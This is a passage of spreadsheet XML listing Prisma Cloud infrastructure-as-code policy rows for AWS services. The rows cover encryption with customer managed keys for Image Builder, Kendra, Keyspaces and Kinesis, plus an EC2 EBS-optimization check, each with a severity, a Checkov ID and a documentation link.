      </c>
      <c r="Y780" t="inlineStr"/>
      <c r="Z780" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_guardduty_organization_configuration","aws_guardduty_detector"]}</t>
        </is>
      </c>
      <c r="AA780" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB780" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC780" t="inlineStr">
        <is>
          <t>CKV2_AWS_3</t>
        </is>
      </c>
      <c r="AD780" t="b">
        <v>1</v>
      </c>
      <c r="AE780" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF780" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>f22347f8-2814-45a4-af73-b2cc4991aacf</t>
        </is>
      </c>
      <c r="AI780" t="inlineStr"/>
      <c r="AJ780" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK780" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" t="inlineStr"/>
      <c r="B781" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C781" s="2" t="inlineStr"/>
      <c r="D781" t="inlineStr"/>
      <c r="E781" t="inlineStr"/>
      <c r="F781" t="inlineStr"/>
      <c r="G781" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J781" t="inlineStr">
        <is>
          <t>IaC:General:aws-imagebuilder</t>
        </is>
      </c>
      <c r="K781" t="inlineStr">
        <is>
          <t>AWS Image Builder component not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L781" t="inlineStr"/>
      <c r="M781" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N781" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O781" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P781" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q781" t="inlineStr"/>
      <c r="R781" t="inlineStr"/>
      <c r="S781" t="inlineStr"/>
      <c r="T781" t="b">
        <v>0</v>
      </c>
      <c r="U781" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V781" t="inlineStr">
        <is>
          <t>IaC:General:aws-imagebuilder-component</t>
        </is>
      </c>
      <c r="W781" t="inlineStr">
        <is>
          <t>Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X781" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-100</t>
        </is>
      </c>
      <c r="Y781" t="inlineStr"/>
      <c r="Z781" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_imagebuilder_component"]}</t>
        </is>
      </c>
      <c r="AA781" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB781" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC781" t="inlineStr">
        <is>
          <t>CKV_AWS_180</t>
        </is>
      </c>
      <c r="AD781" t="b">
        <v>1</v>
      </c>
      <c r="AE781" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF781" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>60691c7d-48b5-4b19-8d4f-201f2a2d43b8</t>
        </is>
      </c>
      <c r="AI781" t="inlineStr"/>
      <c r="AJ781" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK781" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" t="inlineStr"/>
      <c r="B782" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C782" s="2" t="inlineStr"/>
      <c r="D782" t="inlineStr"/>
      <c r="E782" t="inlineStr"/>
      <c r="F782" t="inlineStr"/>
      <c r="G782" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J782" t="inlineStr">
        <is>
          <t>IaC:General:aws-imagebuilder</t>
        </is>
      </c>
      <c r="K782" t="inlineStr">
        <is>
          <t>AWS Image Builder Distribution Configuration is not encrypting AMI by Key Management Service (KMS) using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L782" t="inlineStr"/>
      <c r="M782" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N782" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O782" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P782" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q782" t="inlineStr"/>
      <c r="R782" t="inlineStr"/>
      <c r="S782" t="inlineStr"/>
      <c r="T782" t="b">
        <v>0</v>
      </c>
      <c r="U782" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V782" t="inlineStr">
        <is>
          <t>IaC:General:aws-imagebuilder-distribution-configuration</t>
        </is>
      </c>
      <c r="W782" t="inlineStr">
        <is>
          <t>Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X782" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-image-builder-distribution-configuration-is-encrypting-ami-by-key-management-service-kms-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y782" t="inlineStr"/>
      <c r="Z782" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_imagebuilder_distribution_configuration"]}</t>
        </is>
      </c>
      <c r="AA782" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB782" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC782" t="inlineStr">
        <is>
          <t>CKV_AWS_199</t>
        </is>
      </c>
      <c r="AD782" t="b">
        <v>1</v>
      </c>
      <c r="AE782" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF782" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>83f89517-6aed-4ea5-ab44-6c74d2505ad4</t>
        </is>
      </c>
      <c r="AI782" t="inlineStr"/>
      <c r="AJ782" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK782" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" t="inlineStr"/>
      <c r="B783" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C783" s="2" t="inlineStr"/>
      <c r="D783" t="inlineStr"/>
      <c r="E783" t="inlineStr"/>
      <c r="F783" t="inlineStr"/>
      <c r="G783" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J783" t="inlineStr">
        <is>
          <t>IaC:General:aws-imagebuilder</t>
        </is>
      </c>
      <c r="K783" t="inlineStr">
        <is>
          <t>AWS Image Recipe EBS Disk are not encrypted using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L783" t="inlineStr"/>
      <c r="M783" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N783" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O783" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P783" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q783" t="inlineStr"/>
      <c r="R783" t="inlineStr"/>
      <c r="S783" t="inlineStr"/>
      <c r="T783" t="b">
        <v>0</v>
      </c>
      <c r="U783" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V783" t="inlineStr">
        <is>
          <t>IaC:General:aws-imagebuilder-image-recipe</t>
        </is>
      </c>
      <c r="W783" t="inlineStr">
        <is>
          <t>Ensure that Image Recipe EBS Disk are encrypted with CMK</t>
        </is>
      </c>
      <c r="X783" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-image-recipe-ebs-disk-are-encrypted-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y783" t="inlineStr"/>
      <c r="Z783" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_imagebuilder_image_recipe"]}</t>
        </is>
      </c>
      <c r="AA783" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB783" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC783" t="inlineStr">
        <is>
          <t>CKV_AWS_200</t>
        </is>
      </c>
      <c r="AD783" t="b">
        <v>1</v>
      </c>
      <c r="AE783" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF783" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>8971ec95-660b-4398-8237-09446c03540f</t>
        </is>
      </c>
      <c r="AI783" t="inlineStr"/>
      <c r="AJ783" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK783" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" t="inlineStr"/>
      <c r="B784" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C784" s="2" t="inlineStr"/>
      <c r="D784" t="inlineStr"/>
      <c r="E784" t="inlineStr"/>
      <c r="F784" t="inlineStr"/>
      <c r="G784" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J784" t="inlineStr">
        <is>
          <t>IaC:General:aws-instance</t>
        </is>
      </c>
      <c r="K784" t="inlineStr">
        <is>
          <t>EC2 EBS is not optimized</t>
        </is>
      </c>
      <c r="L784" t="inlineStr"/>
      <c r="M784" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N784" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O784" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P784" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q784" t="inlineStr"/>
      <c r="R784" t="inlineStr"/>
      <c r="S784" t="inlineStr"/>
      <c r="T784" t="b">
        <v>0</v>
      </c>
      <c r="U784" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V784" t="inlineStr">
        <is>
          <t>IaC:General:aws-instance</t>
        </is>
      </c>
      <c r="W784" t="inlineStr">
        <is>
          <t>Ensure that EC2 is EBS optimized</t>
        </is>
      </c>
      <c r="X784" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-ec2-is-ebs-optimized</t>
        </is>
      </c>
      <c r="Y784" t="inlineStr"/>
      <c r="Z784" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_instance"]}</t>
        </is>
      </c>
      <c r="AA784" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB784" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC784" t="inlineStr">
        <is>
          <t>CKV_AWS_135</t>
        </is>
      </c>
      <c r="AD784" t="b">
        <v>1</v>
      </c>
      <c r="AE784" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF784" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>5bc05d46-76c6-4552-b3c4-41e1233bd2b9</t>
        </is>
      </c>
      <c r="AI784" t="inlineStr"/>
      <c r="AJ784" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK784" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" t="inlineStr"/>
      <c r="B785" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C785" s="2" t="inlineStr"/>
      <c r="D785" t="inlineStr"/>
      <c r="E785" t="inlineStr"/>
      <c r="F785" t="inlineStr"/>
      <c r="G785" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J785" t="inlineStr">
        <is>
          <t>IaC:General:aws-kendra</t>
        </is>
      </c>
      <c r="K785" t="inlineStr">
        <is>
          <t>AWS Kendra index Server side encryption does not use Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L785" t="inlineStr"/>
      <c r="M785" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N785" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O785" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P785" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q785" t="inlineStr"/>
      <c r="R785" t="inlineStr"/>
      <c r="S785" t="inlineStr"/>
      <c r="T785" t="b">
        <v>0</v>
      </c>
      <c r="U785" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V785" t="inlineStr">
        <is>
          <t>IaC:General:aws-kendra-index</t>
        </is>
      </c>
      <c r="W785" t="inlineStr">
        <is>
          <t>Ensure Kendra index Server side encryption uses CMK</t>
        </is>
      </c>
      <c r="X785" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks-1</t>
        </is>
      </c>
      <c r="Y785" t="inlineStr"/>
      <c r="Z785" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_kendra_index"]}</t>
        </is>
      </c>
      <c r="AA785" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB785" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC785" t="inlineStr">
        <is>
          <t>CKV_AWS_262</t>
        </is>
      </c>
      <c r="AD785" t="b">
        <v>1</v>
      </c>
      <c r="AE785" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF785" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>71c37d33-8d24-4510-bb77-2b7fec219c4e</t>
        </is>
      </c>
      <c r="AI785" t="inlineStr"/>
      <c r="AJ785" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK785" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" t="inlineStr"/>
      <c r="B786" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C786" s="2" t="inlineStr"/>
      <c r="D786" t="inlineStr"/>
      <c r="E786" t="inlineStr"/>
      <c r="F786" t="inlineStr"/>
      <c r="G786" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J786" t="inlineStr">
        <is>
          <t>IaC:General:aws-keyspaces</t>
        </is>
      </c>
      <c r="K786" t="inlineStr">
        <is>
          <t>AWS Keyspace Table does not use Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L786" t="inlineStr"/>
      <c r="M786" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N786" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O786" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P786" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q786" t="inlineStr"/>
      <c r="R786" t="inlineStr"/>
      <c r="S786" t="inlineStr"/>
      <c r="T786" t="b">
        <v>0</v>
      </c>
      <c r="U786" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V786" t="inlineStr">
        <is>
          <t>IaC:General:aws-keyspaces-table</t>
        </is>
      </c>
      <c r="W786" t="inlineStr">
        <is>
          <t>Ensure Keyspaces Table uses CMK</t>
        </is>
      </c>
      <c r="X786" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-keyspace-table-uses-customer-managed-keys-cmks</t>
        </is>
      </c>
      <c r="Y786" t="inlineStr"/>
      <c r="Z786" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_keyspaces_table"]}</t>
        </is>
      </c>
      <c r="AA786" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB786" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC786" t="inlineStr">
        <is>
          <t>CKV_AWS_265</t>
        </is>
      </c>
      <c r="AD786" t="b">
        <v>1</v>
      </c>
      <c r="AE786" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF786" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>1dcbbdc0-7257-4779-bc84-ba371f9e99a4</t>
        </is>
      </c>
      <c r="AI786" t="inlineStr"/>
      <c r="AJ786" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK786" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" t="inlineStr"/>
      <c r="B787" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C787" s="2" t="inlineStr"/>
      <c r="D787" t="inlineStr"/>
      <c r="E787" t="inlineStr"/>
      <c r="F787" t="inlineStr"/>
      <c r="G787" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J787" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis</t>
        </is>
      </c>
      <c r="K787" t="inlineStr">
        <is>
          <t>AWS Kinesis Firehose's delivery stream is not encrypted</t>
        </is>
      </c>
      <c r="L787" t="inlineStr"/>
      <c r="M787" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N787" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O787" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P787" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q787" t="inlineStr"/>
      <c r="R787" t="inlineStr"/>
      <c r="S787" t="inlineStr"/>
      <c r="T787" t="b">
        <v>0</v>
      </c>
      <c r="U787" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V787" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis-firehose-delivery-stream</t>
        </is>
      </c>
      <c r="W787" t="inlineStr">
        <is>
          <t>Ensure Kinesis Firehose delivery stream is encrypted</t>
        </is>
      </c>
      <c r="X787" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-kinesis-firehoses-delivery-stream-is-encrypted</t>
        </is>
      </c>
      <c r="Y787" t="inlineStr"/>
      <c r="Z787" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_kinesis_firehose_delivery_stream"]}</t>
        </is>
      </c>
      <c r="AA787" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB787" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC787" t="inlineStr">
        <is>
          <t>CKV_AWS_240</t>
        </is>
      </c>
      <c r="AD787" t="b">
        <v>1</v>
      </c>
      <c r="AE787" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF787" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>ebdc58ef-623c-43dd-b73e-1569125a4787</t>
        </is>
      </c>
      <c r="AI787" t="inlineStr"/>
      <c r="AJ787" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK787" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" t="inlineStr"/>
      <c r="B788" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C788" s="2" t="inlineStr"/>
      <c r="D788" t="inlineStr"/>
      <c r="E788" t="inlineStr"/>
      <c r="F788" t="inlineStr"/>
      <c r="G788" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J788" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis</t>
        </is>
      </c>
      <c r="K788" t="inlineStr">
        <is>
          <t>AWS Kinesis Firehose Delivery Streams are not encrypted with CMK</t>
        </is>
      </c>
      <c r="L788" t="inlineStr"/>
      <c r="M788" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N788" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O788" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P788" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q788" t="inlineStr"/>
      <c r="R788" t="inlineStr"/>
      <c r="S788" t="inlineStr"/>
      <c r="T788" t="b">
        <v>0</v>
      </c>
      <c r="U788" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V788" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis-firehose-delivery-stream</t>
        </is>
      </c>
      <c r="W788" t="inlineStr">
        <is>
          <t>Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK</t>
        </is>
      </c>
      <c r="X788" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-kinesis-firehose-delivery-streams-are-encrypted-with-cmk</t>
        </is>
      </c>
      <c r="Y788" t="inlineStr"/>
      <c r="Z788" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_kinesis_firehose_delivery_stream"]}</t>
        </is>
      </c>
      <c r="AA788" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB788" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC788" t="inlineStr">
        <is>
          <t>CKV_AWS_241</t>
        </is>
      </c>
      <c r="AD788" t="b">
        <v>1</v>
      </c>
      <c r="AE788" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF788" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>8b3dc7ea-7f98-4325-83e7-f1e8474ab91a</t>
        </is>
      </c>
      <c r="AI788" t="inlineStr"/>
      <c r="AJ788" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK788" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" t="inlineStr"/>
      <c r="B789" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C789" s="2" t="inlineStr"/>
      <c r="D789" t="inlineStr"/>
      <c r="E789" t="inlineStr"/>
      <c r="F789" t="inlineStr"/>
      <c r="G789" t="b">
        <v>1</v>
      </c>
      <c r="H7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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J789" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis</t>
        </is>
      </c>
      <c r="K789" t="inlineStr">
        <is>
          <t>AWS Kinesis streams encryption is using default KMS keys instead of Customer's Managed Master Keys</t>
        </is>
      </c>
      <c r="L789" t="inlineStr"/>
      <c r="M789" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N789" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O789" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P789" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q789" t="inlineStr"/>
      <c r="R789" t="inlineStr"/>
      <c r="S789" t="inlineStr"/>
      <c r="T789" t="b">
        <v>0</v>
      </c>
      <c r="U789" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V789" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis-stream</t>
        </is>
      </c>
      <c r="W789" t="inlineStr">
        <is>
          <t>Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X789" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-105</t>
        </is>
      </c>
      <c r="Y789" t="inlineStr"/>
      <c r="Z789" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_kinesis_stream"]}</t>
        </is>
      </c>
      <c r="AA789" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB789" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC789" t="inlineStr">
        <is>
          <t>CKV_AWS_185</t>
        </is>
      </c>
      <c r="AD789" t="b">
        <v>1</v>
      </c>
      <c r="AE789" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF789" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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89" t="inlineStr">
        <is>
          <t>1c49c569-2e69-4f8d-a2cf-9d5e9123109b</t>
        </is>
      </c>
      <c r="AI789" t="inlineStr"/>
      <c r="AJ789" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK789" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" t="inlineStr"/>
      <c r="B790" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C790" s="2" t="inlineStr"/>
      <c r="D790" t="inlineStr"/>
      <c r="E790" t="inlineStr"/>
      <c r="F790" t="inlineStr"/>
      <c r="G790" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J790" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis</t>
        </is>
      </c>
      <c r="K790" t="inlineStr">
        <is>
          <t>AWS Kinesis Video Stream not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L790" t="inlineStr"/>
      <c r="M790" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N790" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O790" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P790" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q790" t="inlineStr"/>
      <c r="R790" t="inlineStr"/>
      <c r="S790" t="inlineStr"/>
      <c r="T790" t="b">
        <v>0</v>
      </c>
      <c r="U790" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V790" t="inlineStr">
        <is>
          <t>IaC:General:aws-kinesis-video-stream</t>
        </is>
      </c>
      <c r="W790" t="inlineStr">
        <is>
          <t>Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X790" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-97</t>
        </is>
      </c>
      <c r="Y790" t="inlineStr"/>
      <c r="Z790" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_kinesis_video_stream"]}</t>
        </is>
      </c>
      <c r="AA790" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB790" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC790" t="inlineStr">
        <is>
          <t>CKV_AWS_177</t>
        </is>
      </c>
      <c r="AD790" t="b">
